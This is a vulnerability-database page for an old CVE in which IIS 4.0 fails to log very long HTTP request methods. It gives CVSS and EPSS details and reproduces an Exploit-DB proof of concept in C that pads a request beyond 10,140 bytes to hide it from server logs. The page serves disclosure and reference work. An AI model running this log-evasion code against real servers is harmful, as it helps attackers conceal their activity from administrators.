Notifications for a CVE
Stay informed of any changes for a specific CVE.
CVE Descriptions
IIS 4.0 and Apache log HTTP request methods, regardless of how long they are, allowing a remote attacker to hide the URL they really request.
CVE Informations
Metrics
| Metrics | Score | Severity | CVSS Vector | Source |
|---|---|---|---|---|
| V2 | 5 | AV:N/AC:L/Au:N/C:P/I:N/A:N | [email protected] |
EPSS
EPSS is a scoring model that predicts the likelihood of a vulnerability being exploited.
EPSS Score
The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.
EPSS Percentile
The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.
Exploit information
Exploit Database EDB-ID : 19149
Publication date : 1999-01-21 23h00 +00:00
Author : Mnemonix
EDB Verified : Yes
// source: https://www.securityfocus.com/bid/191/info
An http get request against an IIS4 server will not be logged if the request is longer than 10150 bytes long.
/* Compile with eg Visual C++ and link with wsock32.lib
#include <stdio.h>
#include <winsock2.h>
#include <string.h>
int main (int argc, char *argv[])
{
int snd, rcv, err, portno,a=0,b, res;
char resp[1024];
WORD wVersionRequested;
WSADATA wsaData;
struct sockaddr_in sa;
struct hostent *he;
SOCKET sock;
if (argc !=2)
{
printf("Usage:\nc:\\>%s target_machine\n\nDavid Litchfield\n21st January
1999\n", argv[0]);
return 0;
}
wVersionRequested = MAKEWORD( 2, 0 );
err = WSAStartup( wVersionRequested, &wsaData );
if ( err != 0 )
{
printf("No winsock.dll\n");
return 0;
}
if ( LOBYTE( wsaData.wVersion ) != 2 || HIBYTE( wsaData.wVersion ) != 0 )
{
printf("No winsock.dll - 2nd\n");
WSACleanup( );
return 0;
}
if ((he = gethostbyname(argv[1])) == NULL)
{
printf("Invalid Host\n");
return 0;
}
sock=socket(AF_INET,SOCK_STREAM,0);
if (sock==INVALID_SOCKET)
{
printf("Invalid Socket!\n");
return 0;
}
else
{
printf("");
}
sa.sin_addr.s_addr=INADDR_ANY;
sa.sin_family=AF_INET;
bind(sock,(struct sockaddr *)&sa,sizeof(sa));
sa.sin_port=htons(80);
memcpy(&sa.sin_addr,he->h_addr,he->h_length);
if(connect(sock,(struct sockaddr *)&sa,sizeof(sa)) < 0)
{
printf("Failed to connect!\n");
}
else
{
/* This loop creates the REQUEST_METHOD and makes it 10140 bytes long
while (a < 10141)
{
snd=send(sock,"A", 1, 0);
a ++;
}
snd=send(sock," /default.asp HTTP/1.0\n\n",43,0);
rcv=recv(sock,resp,256,0);
printf("\n%s",resp);
rcv=recv(sock,resp,1024,0);
printf("\n%s\n\n",resp);
}
closesocket(sock);
return 0;
}
Products Mentioned
Configuraton 0
Microsoft>>Internet_information_server >> Version 4.0
- Microsoft>>Internet_information_server >> Version 4.0 (Open CPE detail)
- Microsoft>>Internet_information_server >> Version 4.0 (Open CPE detail)
- Microsoft>>Internet_information_server >> Version 4.0 (Open CPE detail)
- Microsoft>>Internet_information_server >> Version 4.0 (Open CPE detail)
- Microsoft>>Internet_information_server >> Version 4.0 (Open CPE detail)
- Microsoft>>Internet_information_server >> Version 4.0 (Open CPE detail)
References
2025©
tesweb SA
